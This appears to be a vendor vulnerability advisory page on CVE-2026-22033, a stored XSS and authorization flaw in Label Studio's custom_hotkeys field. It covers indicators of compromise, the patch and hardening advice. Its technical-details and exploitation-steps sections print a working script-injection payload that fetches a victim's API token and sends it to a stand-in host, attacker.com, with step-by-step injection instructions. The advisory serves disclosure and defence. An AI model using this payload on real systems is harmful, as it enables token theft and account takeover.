CVE-2026-22033: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-22033 is a stored Cross-Site Scripting (XSS) vulnerability chained with an Insecure Direct Object Reference (IDOR) / improper authorization flaw in HumanSignal Label Studio, an open-source data labeling platform. It affects all versions up to and including 1.22.0 (with the advisory specifically noting version 1.21.0 as confirmed affected). Discovered and reported by researcher david3107 (DCODX-AI), the vulnerability was published on January 12, 2026. It carries a CVSS v4.0 base score of 8.6 (High) and a CVSS v3.1 base score of 5.4 (Medium) (GitHub Advisory, HumanSignal Advisory).

Technical details

The root cause is improper neutralization of user-controlled input (CWE-79) combined with improper authorization (CWE-285/CWE-284). In templates/base.html, the application renders the user.custom_hotkeys field directly into a JavaScript variable using {{ user.custom_hotkeys|json_dumps_ensure_ascii|safe }}. The json_dumps_ensure_ascii filter performs json.dumps() without escaping < and > characters, and the |safe filter suppresses Django's automatic HTML escaping, allowing injected script tags to break out of the JavaScript context. An authenticated attacker can update their own custom_hotkeys via PATCH /api/users/{id}/ with a malicious payload (e.g., "INJ;</script><script>fetch('/api/current-user/token').then(r=>r.json()).then(t=>fetch('https://attacker.com/?t='+t.token))/*xx": {"key": "x", "active": true}). Because the /api/current-user/token endpoint lacks robust CSRF protection, the injected script can silently exfiltrate any victim's API token when they load any page using base.html (GitHub Advisory, Patch Commit).

Impact

Successful exploitation enables full account takeover of any user who loads a page rendered with templates/base.html while the malicious hotkey payload is active. The injected script can silently steal API tokens from the /api/current-user/token endpoint, enabling unauthorized access to internal and external APIs, data exfiltration, token reset, and privilege escalation. If the victim is an administrator or privileged user, the impact extends to wide system compromise, and cross-user token exfiltration could affect the entire organization's application and data (GitHub Advisory, HumanSignal Advisory).

Exploitability

A proof-of-concept exploit is publicly available in the GitHub security advisory, with the full exploit chain confirmed manually by the reporter. The vulnerability requires only a low-privileged authenticated account to inject the payload, and victim interaction is limited to simply loading any page in the application. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.041% (0.014% per GitHub Advisory), placing it in the lower percentiles for near-term exploitation probability (GitHub Advisory, HumanSignal Advisory).

Exploitation steps

  1. Authenticate to Label Studio: Log in to the target Label Studio instance with any valid low-privileged account via GET /user/login/.
  2. Identify your user ID: Send a request to GET /api/current-user/whoami and note the id field in the JSON response (e.g., "id": 25).
  3. Craft the malicious hotkey payload: Construct a JSON payload for the custom_hotkeys field that breaks out of the JavaScript variable context and injects a script to exfiltrate the victim's API token. Example payload key: INJ;</script><script>fetch('/api/current-user/token').then(r=>r.json()).then(t=>fetch('https://attacker.com/?t='+t.token))/*xx
  4. Inject the payload via PATCH request: Send PATCH /api/users/{your_id}/ with Content-Type: application/json and the crafted custom_hotkeys body. Confirm the malicious string is stored in the response.
  5. Wait for victim interaction: When any other user (or administrator) loads any page using templates/base.html (e.g., /, /user/account/), the stored XSS payload executes in their browser context.
  6. Collect exfiltrated API tokens: The injected script silently fetches the victim's API token from /api/current-user/token and sends it to the attacker-controlled server, enabling full account takeover and unauthorized API access (GitHub Advisory, HumanSignal Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains immediately after loading Label Studio pages; GET requests to /api/current-user/token originating from browser sessions not initiated by the token owner; unusual API calls to attacker-controlled endpoints containing token parameters.
  • Logs: Label Studio access logs showing PATCH /api/users/{id}/ requests with unusually long or encoded custom_hotkeys values containing <script>, fetch(, or similar JavaScript constructs; repeated GET /api/current-user/token requests from multiple different user sessions in a short timeframe.
  • Application Data: The custom_hotkeys field in the user database containing JavaScript code fragments, closing </script> tags, or fetch() calls when inspected directly.
  • Process/Session: Unexpected API token usage from IP addresses or user agents inconsistent with the legitimate account owner's activity, suggesting stolen token reuse (GitHub Advisory).

Mitigation and workarounds

The fix was merged on December 29, 2025 (commit ea2462b) and published in the security advisory on January 12, 2026. The patch adds an escape_lt_gt template filter to properly escape < and > characters in the custom_hotkeys output before rendering: {{ user.custom_hotkeys|json_dumps_ensure_ascii|escape_lt_gt|safe }}. Users should upgrade Label Studio to a version after 1.22.0 that includes this fix. As additional hardening measures, implement a strict Content Security Policy (CSP) header, review and restrict user privileges, monitor for suspicious API token usage, and consider network segmentation to limit API token exposure (Patch Commit, HumanSignal Advisory).

Community reactions

The vulnerability was discovered and reported by researcher david3107 under the DCODX-AI team, with a detailed write-up published at infinitsec.net shortly after disclosure. The advisory was reviewed and published by HumanSignal on January 12, 2026, with the fix having been merged into the development branch on December 29, 2025. No significant broader media coverage or notable community controversy has been identified beyond the standard vulnerability disclosure channels (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management